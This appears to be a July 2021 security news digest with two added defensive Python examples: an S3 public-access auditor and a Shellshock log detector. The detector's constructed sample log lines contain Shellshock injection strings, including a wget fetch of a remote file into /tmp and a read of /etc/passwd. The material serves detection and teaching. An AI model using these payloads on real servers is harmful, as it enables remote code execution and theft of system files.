OSN July 23, 2021

Fortify Security Team
Jul 23, 2021

Title: Researchers Find New Attack Vector Against Kubernetes Clusters via Misconfigured Argo Workflows Instances

Date Published: July 23, 2021


Excerpt: “Some cyberattackers have been able to take advantage of misconfigured permissions that give them access to an open Argo dashboard where they can submit their own workflow. The ‘kannix/monero-miner,’ according to the researchers, requires little skill to use, and the report notes that other security teams have discovered large-scale cryptocurrency mining attacks against Kubernetes clusters. ‘In Docker Hub there are still a number of options for Monero mining that attackers can use. With a simple search it shows that there are at least 45 other containers with millions of downloads,’ the study said.”

Title: Over 80 US Municipalities’ Sensitive Information, Including Residents’ Personal Data, Left Vulnerable in Massive Data Breach

Date Published: July 23, 2021


Excerpt: “Over 100 US cities appeared to be using the same product, mapsonline.net, provided by an American company named PeopleGIS. The data of these municipalities was stored in several misconfigured Amazon S3 buckets that were sharing similar naming conventions to MapsOnline. Due to this, we believe these cities are using the same software solution. Our team reached out to the company and the buckets have since been secured. PeopleGIS is a Massachusetts-based company specializing in information management software. Many city municipalities in the state of Massachusetts and a few in surrounding states like Connecticut and New Hampshire use their software and platforms to manage a variety of data.”
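The excerpt above says the buckets were "misconfigured" without saying what that looks like on the wire. The following is an added example of my own, not code from the report or from PeopleGIS: it evaluates a bucket ACL and bucket policy in the dict shapes that boto3's `get_bucket_acl()` and `get_bucket_policy()` return, and reports the grants that make a bucket readable by anyone. The `SAMPLE_ACL` and `SAMPLE_POLICY` inputs are constructed for the demonstration (the bucket name `example-gis-maps` and the VPC endpoint ID are placeholders, not the buckets from the story), so the block runs offline; feed it live API output to check your own buckets.

```python
"""Flag an S3 bucket whose ACL or bucket policy grants anonymous access.

Added example; not code from the report quoted above. The input dicts mirror the
shapes boto3's get_bucket_acl() / get_bucket_policy() return, so the same functions
can be fed live data, but the samples below are constructed, not the real buckets.
"""
import json

# Grantee URIs that AWS treats as "everyone" (anonymous) and "any AWS account".
PUBLIC_GROUPS = {
    "http://acs.amazonaws.com/groups/global/AllUsers": "anonymous (AllUsers)",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers": "any AWS account (AuthenticatedUsers)",
}


def _wildcard_principal(principal):
    """True for Principal "*" or {"AWS": "*"} (also when "*" is one entry of a list)."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        aws = principal.get("AWS", [])
        aws = [aws] if isinstance(aws, str) else aws
        return "*" in aws
    return False


def acl_findings(acl):
    """Grants to the global AllUsers / AuthenticatedUsers groups, as readable strings."""
    findings = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        if grantee.get("Type") == "Group" and grantee.get("URI") in PUBLIC_GROUPS:
            findings.append(f"ACL grants {grant['Permission']} to {PUBLIC_GROUPS[grantee['URI']]}")
    return findings


def policy_findings(policy):
    """Allow statements with a wildcard principal.

    Returns (public, review): unconditioned statements are public outright; ones that
    carry a Condition (VPC endpoint, source IP, ...) still need a human look.
    """
    public, review = [], []
    if isinstance(policy, str):  # get_bucket_policy()["Policy"] is a JSON string
        policy = json.loads(policy)
    statements = policy.get("Statement", [])
    statements = [statements] if isinstance(statements, dict) else statements
    for st in statements:
        if st.get("Effect") != "Allow" or not _wildcard_principal(st.get("Principal")):
            continue
        actions = st.get("Action", [])
        actions = [actions] if isinstance(actions, str) else actions
        msg = f"policy statement {st.get('Sid', '<no Sid>')} allows {', '.join(actions)} to everyone"
        (review if st.get("Condition") else public).append(msg)
    return public, review


def assess_bucket(acl, policy=None):
    """Return (is_public, public_findings, review_findings) for one bucket."""
    public = acl_findings(acl)
    review = []
    if policy:
        p, r = policy_findings(policy)
        public += p
        review += r
    return bool(public), public, review


# Constructed sample: bucket listing opened via ACL, object reads opened via policy.
SAMPLE_ACL = {
    "Owner": {"ID": "example-owner-id"},
    "Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": "example-owner-id"}, "Permission": "FULL_CONTROL"},
        {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
         "Permission": "READ"},  # READ on a bucket ACL = anyone can list its keys
    ],
}
SAMPLE_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
         "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-gis-maps/*"},
        {"Sid": "VpcOnly", "Effect": "Allow", "Principal": {"AWS": "*"},
         "Action": ["s3:GetObject", "s3:ListBucket"],
         "Resource": "arn:aws:s3:::example-gis-maps",
         "Condition": {"StringEquals": {"aws:SourceVpce": "vpce-0123456789abcdef0"}}},
    ],
})

# The account-wide fix that overrides both mechanisms: the PublicAccessBlockConfiguration
# you pass to put_public_access_block().
BLOCK_PUBLIC_ACCESS = {
    "BlockPublicAcls": True, "IgnorePublicAcls": True,
    "BlockPublicPolicy": True, "RestrictPublicBuckets": True,
}

if __name__ == "__main__":
    is_public, public, review = assess_bucket(SAMPLE_ACL, SAMPLE_POLICY)
    print("PUBLIC" if is_public else "not public")
    for f in public:
        print(" - PUBLIC:", f)
    for f in review:
        print(" - REVIEW:", f)
```

Run against the sample, the ACL grant and the `PublicRead` statement are reported as public and the VPC-conditioned statement is queued for review. The practical lesson from the story is the last dict: a bucket-by-bucket audit like this catches what already leaked, while S3 Block Public Access at the account level keeps the next bucket that follows the same naming convention from ever being exposed.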

Title: Kaseya Obtains Universal Decryptor for REvil Ransomware Victims

Date Published: July 22, 2021


Excerpt: “Kaseya received a universal decryptor that allows victims of the July 2nd REvil ransomware attack to recover their files for free. On July 2nd, the REvil ransomware operation launched a massive attack by exploiting a zero-day vulnerability in the Kaseya VSA remote management application to encrypt approximately sixty managed service providers and an estimated 1,500 businesses. After the attack, the threat actors demanded $70 million for a universal decryptor, $5 million for MSPs, and $40,000 for each extension encrypted on a victim’s network.”

Title: Microsoft Warns Over This Unusual Malware That Targets Windows and Linux

Date Published: July 23, 2021


Excerpt: “‘Notably, LemonDuck removes other attackers from a compromised device by getting rid of competing malware and preventing any new infections by patching the same vulnerabilities it used to gain access.’ Cisco’s Talos malware researchers have been scoping out the group’s Exchange activities too. It found LemonDuck was using automated tools to scan, detect, and exploit servers before loading payloads such as the Cobalt Strike pen-testing kit — a favored tool for lateral movement — and web shells, allowing malware to install additional modules.”

Title: Nasty macOS Malware XCSSET Now Targets Google Chrome, Telegram Software

Date Published: July 23, 2021


Excerpt: “The malware comes with numerous capabilities, such as reading and dumping Safari cookies, injecting malicious JavaScript code into various websites, stealing information from applications, such as Notes, WeChat, Skype, Telegram, and encrypting user files. Earlier this April, XCSSET received an upgrade that enabled the malware authors to target macOS 11 Big Sur as well as Macs running on M1 chipset by circumventing new security policies instituted by Apple in the latest operating system.”

Title: Dutch Police Arrest Two Hackers Tied to “Fraud Family” Cybercrime Ring

Date Published: July 23, 2021


Excerpt: “The apprehended suspects, a 24-year-old software engineer and a 15-year-old boy, are said to have been the main developer and seller of the phishing frameworks that were employed to collect login data from bank customers. The attacks primarily singled out users in the Netherlands and Belgium. Believed to be active since at least 2020, the cybercriminal syndicate has been codenamed “Fraud Family” by cybersecurity firm Group-IB. The frameworks come with phishing kits, tools designed to steal information, and web panels, which allow the fraudsters to interact with the actual phishing site in real time and retrieve the stolen user data.”

Title: Popular Wi-Fi Routers Still Using Default Passwords Making Them Susceptible to Attacks

Date Published: July 22, 2021


Excerpt: “A router with the default access credentials could grant malicious actors a foothold into your home network and even to the devices connected to it. Once they have their foot in the door, the cybercriminals could use the access to monitor what any device connected to the router is doing, what websites they’re browsing, and they could see any unencrypted data being sent over the network. Moreover, the threat actors could also abuse your connection to download pirated content or use it to access illegal materials, potentially making you a suspect or being liable for these activities.”

Title: Exploiting Shellshock (CVE-2014-6271) on a Remote Server (Inside Lab)

Date Published: July 19, 2021


Excerpt: “Using nikto I confirmed that our target is vulnerable to the Shellshock vulnerability (CVE-2014-6271). I searched on Google for a brief description of the Shellshock vulnerability and found out that Shellshock allows systems containing a vulnerable version of Bash to be exploited to execute commands with higher privileges. I also discovered that an exploit for this vulnerability exists on Metasploit. So I went ahead to fire up Metasploit in my terminal.”
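The lab write-up quoted above covers only the attacker's side. As an added example of my own (not code from that write-up or from nikto/Metasploit), here is the defender's view of the same bug: CVE-2014-6271 fires when a CGI handler exports a request header as an environment variable and bash parses the `() {` function-export prefix, running whatever follows the closing brace. The block scans Apache combined-format access log lines for that prefix in the User-Agent and Referer fields, and runs the canonical local probe against the host's bash. The log lines are constructed, and `SHELLSHOCK_RE` is a hypothetical signature that will not catch every encoding or obfuscation.

```python
"""Detect Shellshock (CVE-2014-6271) probes in web server access logs.

Added illustration, not code from the original write-up. The log lines are
constructed (not captured from a real server) and the signature regex is a
hypothetical pattern, not an exhaustive one.
"""
import re
import shutil
import subprocess

# Bash function-export prefix "() {", a (possibly empty) body, then a trailing
# command after the closing brace: the shape that triggers CVE-2014-6271.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;\s*(?P<cmd>.+)")

# Apache "combined" format. mod_cgi exports the quoted Referer and User-Agent
# fields as HTTP_REFERER / HTTP_USER_AGENT, which is why they are the usual
# injection points. The quoted fields allow backslash-escaped quotes, as Apache writes them.
_QUOTED = r'(?:[^"\\]|\\.)*'
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>' + _QUOTED + r')" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>' + _QUOTED + r')" "(?P<ua>' + _QUOTED + r')"'
)


def find_shellshock_probes(lines):
    """Return (ip, request, header, injected_command) for every line carrying a probe."""
    hits = []
    for line in lines:
        m = COMBINED_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        for header in ("ua", "referer"):
            s = SHELLSHOCK_RE.search(m.group(header))
            if s:
                hits.append((m.group("ip"), m.group("req"), header, s.group("cmd").strip()))
    return hits


def bash_is_vulnerable(bash=None):
    """Run the canonical CVE-2014-6271 probe against a local bash.

    A vulnerable bash executes the trailing `echo VULNERABLE` while importing the
    function-valued variable; a patched one only runs the requested command.
    Returns None when no bash can be executed.
    """
    bash = bash or shutil.which("bash")
    if not bash:
        return None
    env = {"x": "() { :; }; echo VULNERABLE", "PATH": "/usr/bin:/bin"}
    try:
        out = subprocess.run([bash, "-c", "echo probe"], env=env,
                             capture_output=True, text=True, timeout=10).stdout
    except (OSError, subprocess.SubprocessError):
        return None
    return "VULNERABLE" in out


# Constructed sample lines: two classic probes, one benign request, one probe with
# Apache-escaped double quotes inside the User-Agent.
SAMPLE_LOG = [
    '203.0.113.7 - - [19/Jul/2021:10:02:11 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :; }; /bin/bash -c \'id\'"',
    '198.51.100.3 - - [19/Jul/2021:10:02:12 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "() { ignored; }; echo; /usr/bin/wget http://198.51.100.3/x -O /tmp/x" "curl/7.64.1"',
    '192.0.2.10 - - [19/Jul/2021:10:02:13 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.9 - - [19/Jul/2021:10:02:14 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 500 0 "-" "() { :; }; /bin/bash -c \\"cat /etc/passwd\\""',
]

if __name__ == "__main__":
    for ip, req, header, cmd in find_shellshock_probes(SAMPLE_LOG):
        print(f"{ip} {req!r} via {header}: {cmd}")
    print("local bash vulnerable:", bash_is_vulnerable())
```

Three of the four sample lines are flagged, with the injected command extracted so an analyst can see what the probe tried to fetch or run; the HTTP status is irrelevant to detection because a 500 from a failing CGI script still means the header reached bash. The second line shows why scanning only User-Agent is not enough.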

Title: Akamai Software Update Triggered a Bug That Took Offline Major Sites

Date Published: July 23, 2021


Excerpt: “A software configuration update triggered a bug in the Akamai DNS which took offline major websites, including Steam, the PlayStation Network, AWS, Google, and Salesforce. “A software configuration update triggered a bug in the DNS (domain name system) system, the system that directs browsers to websites,” reads a statement published by Akamai. “This caused a disruption impacting availability of some customer websites.” According to the company, around 500 of its customers were impacted by the incident. In order to restore operations, the company rolled back the update. The company recognized the impact of this issue and apologized to its customers.”

Title: Microsoft Has a Workaround for ‘HiveNightmare’ Flaw: Nuke Your Shadow Copies From Orbit

Date Published: July 22, 2021


Excerpt: “It’s hardly an ideal solution, since those shadow copies could have been taken for a good reason (rather than Microsoft just firing off the operation when it feels like it). As the CVE update notes: “Deleting shadow copies could impact restore operations, including the ability to restore data with third-party backup applications.” However, the issue is that those shadow copies could contain files to which miscreants might gain access, including private data such as credentials.”
